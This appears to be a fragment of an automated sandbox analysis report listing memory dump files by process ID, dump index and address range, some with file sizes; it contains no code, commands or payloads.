memory/1512-57-0x0000000000000000-mapping.dmp
-
memory/1960-86-0x0000000000000000-mapping.dmp
-
memory/1960-85-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/2004-12-0x0000000000000000-mapping.dmp
-
memory/2456-47-0x0000000000000000-mapping.dmp
-
memory/2508-53-0x0000000000000000-mapping.dmp
-
memory/2512-33-0x0000000000000000-mapping.dmp
-
memory/2652-41-0x0000000000000000-mapping.dmp
-
memory/2808-38-0x0000000000000000-mapping.dmp
-
memory/2812-0-0x0000000000000000-mapping.dmp
-
memory/2924-34-0x0000000000000000-mapping.dmp
-
memory/2924-48-0x0000000000000000-mapping.dmp
-
memory/3376-50-0x0000000000000000-mapping.dmp
-
memory/3624-24-0x0000000000000000-mapping.dmp
-
memory/3740-26-0x0000000005670000-0x0000000005671000-memory.dmpFilesize
4KB
-
memory/3740-25-0x0000000005460000-0x0000000005491000-memory.dmpFilesize
196KB
-
memory/3740-10-0x0000000072050000-0x000000007273E000-memory.dmpFilesize
6.9MB
-
memory/3740-2-0x0000000000000000-mapping.dmp
-
memory/3740-22-0x00000000054C0000-0x00000000054C1000-memory.dmpFilesize
4KB
-
memory/3740-14-0x0000000000C00000-0x0000000000C01000-memory.dmpFilesize
4KB
-
memory/3740-19-0x00000000059C0000-0x00000000059C1000-memory.dmpFilesize
4KB
-
memory/3892-52-0x0000000000000000-mapping.dmp
-
memory/3912-46-0x0000000000000000-mapping.dmp
-
memory/3936-32-0x0000000000000000-mapping.dmp
-
memory/3976-58-0x0000000000000000-mapping.dmp
-
memory/3976-56-0x0000000000000000-mapping.dmp
-
memory/3996-35-0x0000000000000000-mapping.dmp
-
memory/4000-5-0x0000000000000000-mapping.dmp
-
memory/4000-44-0x0000000005C80000-0x0000000005C81000-memory.dmpFilesize
4KB
-
memory/4000-27-0x00000000052F0000-0x000000000531D000-memory.dmpFilesize
180KB
-
memory/4000-42-0x00000000056D0000-0x00000000056D5000-memory.dmpFilesize
20KB
-
memory/4000-11-0x0000000072050000-0x000000007273E000-memory.dmpFilesize
6.9MB
-
memory/4000-13-0x0000000000A40000-0x0000000000A41000-memory.dmpFilesize
4KB
-
memory/4000-29-0x0000000005450000-0x0000000005455000-memory.dmpFilesize
20KB
-
memory/4004-59-0x0000000000000000-mapping.dmp
-
memory/4056-49-0x0000000000000000-mapping.dmp
-
memory/4056-36-0x0000000000000000-mapping.dmp
-
memory/4056-54-0x0000000000000000-mapping.dmp
-
memory/4128-60-0x0000000000000000-mapping.dmp
-
memory/4128-82-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/4128-83-0x0000000000000000-mapping.dmp
-
memory/4164-61-0x0000000000000000-mapping.dmp
-
memory/4180-62-0x0000000000000000-mapping.dmp
-
memory/4208-63-0x0000000000000000-mapping.dmp
-
memory/4420-66-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/4420-67-0x0000000000000000-mapping.dmp
-
memory/4436-70-0x0000000000000000-mapping.dmp
-
memory/4436-68-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/4572-74-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/4572-75-0x0000000000000000-mapping.dmp
-
memory/4720-79-0x0000000077202000-0x000000007720200C-memory.dmpFilesize
12B
-
memory/4720-80-0x0000000000000000-mapping.dmp